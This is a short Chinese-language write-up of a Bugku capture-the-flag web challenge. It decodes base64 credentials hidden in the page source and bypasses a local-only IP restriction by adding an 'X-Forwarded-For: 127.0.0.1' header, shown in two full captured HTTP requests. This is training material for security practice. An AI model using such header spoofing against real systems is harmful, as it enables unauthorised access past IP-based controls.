bugku-web-本地管理员-编程知识

bugku-web-本地管理员

在页面源码的最右段发现一个base加密数据

dGVzdDEyMw==
解密后
test123
将test作为账号123为密码尝试

说这个ip被禁止访问
那么问题应该出现在ip上
这里将请求报文抓取下来

POST / HTTP/1.1
Host: 114.67.175.224:18838
Content-Length: 18
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://114.67.175.224:18838
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://114.67.175.224:18838/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: Hm_lvt_c1b044f909411ac4213045f0478e96fc=1711286763; _ga=GA1.1.52075818.1711286767; _gid=GA1.1.1919961319.1711286767; Hm_lpvt_c1b044f909411ac4213045f0478e96fc=1711290145; _ga_F3VRZT58SJ=GS1.1.1711288951.2.1.1711290145.0.0.0
Connection: closeuser=test&pass=123

这里我们想办法让发送过去的ip改一改
让报文伪造从本地发送的情况
添加字段

X-Forwarded-For:127.0.0.1

现在的报文

POST / HTTP/1.1
Host: 114.67.175.224:18838
Content-Length: 18
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://114.67.175.224:18838
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://114.67.175.224:18838/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: Hm_lvt_c1b044f909411ac4213045f0478e96fc=1711286763; _ga=GA1.1.52075818.1711286767; _gid=GA1.1.1919961319.1711286767; Hm_lpvt_c1b044f909411ac4213045f0478e96fc=1711290145; _ga_F3VRZT58SJ=GS1.1.1711288951.2.1.1711290145.0.0.0
Connection: close
X-Forwarded-For:127.0.0.1user=test&pass=123

发送